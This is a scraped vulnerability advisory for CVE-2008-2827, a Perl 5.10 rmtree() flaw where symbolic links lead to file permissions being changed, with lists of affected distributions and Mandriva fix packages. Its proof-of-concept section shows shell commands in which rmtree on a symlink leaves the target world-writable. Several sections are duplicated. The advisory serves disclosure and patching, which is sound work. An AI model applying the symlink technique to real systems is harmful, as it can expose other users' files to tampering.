Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
BID:29902
Info
Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
| Bugtraq ID: | 29902 |
| Class: | Design Error |
| CVE: |
CVE-2008-2827 |
| Remote: | No |
| Local: | Yes |
| Published: | Jun 23 2008 12:00AM |
| Updated: | Apr 13 2015 09:37PM |
| Credit: | Frans Pop |
| Vulnerable: |
SuSE SUSE Linux Enterprise Server 9 SP3 SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 10 SP2 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise Server 10 SuSE SUSE Linux Enterprise SDK 9 SuSE SUSE Linux Enterprise SDK 10.SP1 SuSE SUSE Linux Enterprise SDK 10 SP2 SuSE SUSE Linux Enterprise SDK 10 SP1 SuSE SUSE Linux Enterprise SDK 10 SuSE Suse Linux Enterprise Desktop 10 SP2 SuSE Suse Linux Enterprise Desktop 10 SP1 SuSE Suse Linux Enterprise Desktop 10 SuSE SUSE Linux Enterprise 10 SP2 DEBUGINFO SuSE SUSE Linux Enterprise 10 SP1 DEBUGINFO SuSE Linux Desktop 10 SuSE Linux 10.1 x86-64 SuSE Linux 10.1 x86 SuSE Linux 10.1 ppc SuSE Linux 10.0 x86-64 SuSE Linux 10.0 x86 SuSE Linux 10.0 ppc S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. SuSE Linux Open-Xchange 4.1 S.u.S.E. openSUSE 11.0 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 S.u.S.E. openSUSE 10.1 S.u.S.E. Open-Enterprise-Server 9.0 S.u.S.E. Open-Enterprise-Server 1 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop SDK 9.0 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 10.2 X86 64 S.u.S.E. Linux Professional 10.2 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 10.2 X86 64 S.u.S.E. Linux Personal 10.2 S.u.S.E. Linux Personal 10.1 Mandriva Linux Mandrake 2008.1 x86_64 Mandriva Linux Mandrake 2008.1 Larry Wall Perl 5.10 |
| Not Vulnerable: | |
Discussion
Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links.
Attackers can leverage this issue to change the permissions of arbitrary files.
Perl 5.10.0 is vulnerable; other versions may also be affected.
Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links.
Attackers can leverage this issue to change the permissions of arbitrary files.
Perl 5.10.0 is vulnerable; other versions may also be affected.
Exploit / POC
Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
The following example is available:
% touch foo
% ln -s foo bar
% ls -l foo bar
lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo
-rw-r--r-- 1 example example 0 2008-06-21 09:06 foo
% perl -e 'use File::Path rmtree; rmtree bar'
% ls -l foo bar
ls: cannot access bar: No such file or directory
-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo
The following example is available:
% touch foo
% ln -s foo bar
% ls -l foo bar
lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo
-rw-r--r-- 1 example example 0 2008-06-21 09:06 foo
% perl -e 'use File::Path rmtree; rmtree bar'
% ls -l foo bar
ls: cannot access bar: No such file or directory
-rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo
Solution / Fix
Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
Solution:
Fixes are available. Please see the references for more information.
Mandriva Linux Mandrake 2008.1 x86_64
Mandriva Linux Mandrake 2008.1
Solution:
Fixes are available. Please see the references for more information.
Mandriva Linux Mandrake 2008.1 x86_64
-
MandrakeSoft perl-5.10.0-13.1mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-base-5.10.0-13.1mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-devel-5.10.0-13.1mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-doc-5.10.0-13.1mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-suid-5.10.0-13.1mdv2008.1.x86_64.rpm
http://www.mandriva.com/en/download/
Mandriva Linux Mandrake 2008.1
-
MandrakeSoft perl-5.10.0-13.1mdv2008.1.i586.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-base-5.10.0-13.1mdv2008.1.i586.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-devel-5.10.0-13.1mdv2008.1.i586.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-doc-5.10.0-13.1mdv2008.1.i586.rpm
http://www.mandriva.com/en/download/ -
MandrakeSoft perl-suid-5.10.0-13.1mdv2008.1.i586.rpm
http://www.mandriva.com/en/download/
References
Perl 'rmtree()' Function Local Insecure Permissions Vulnerability
References:
References: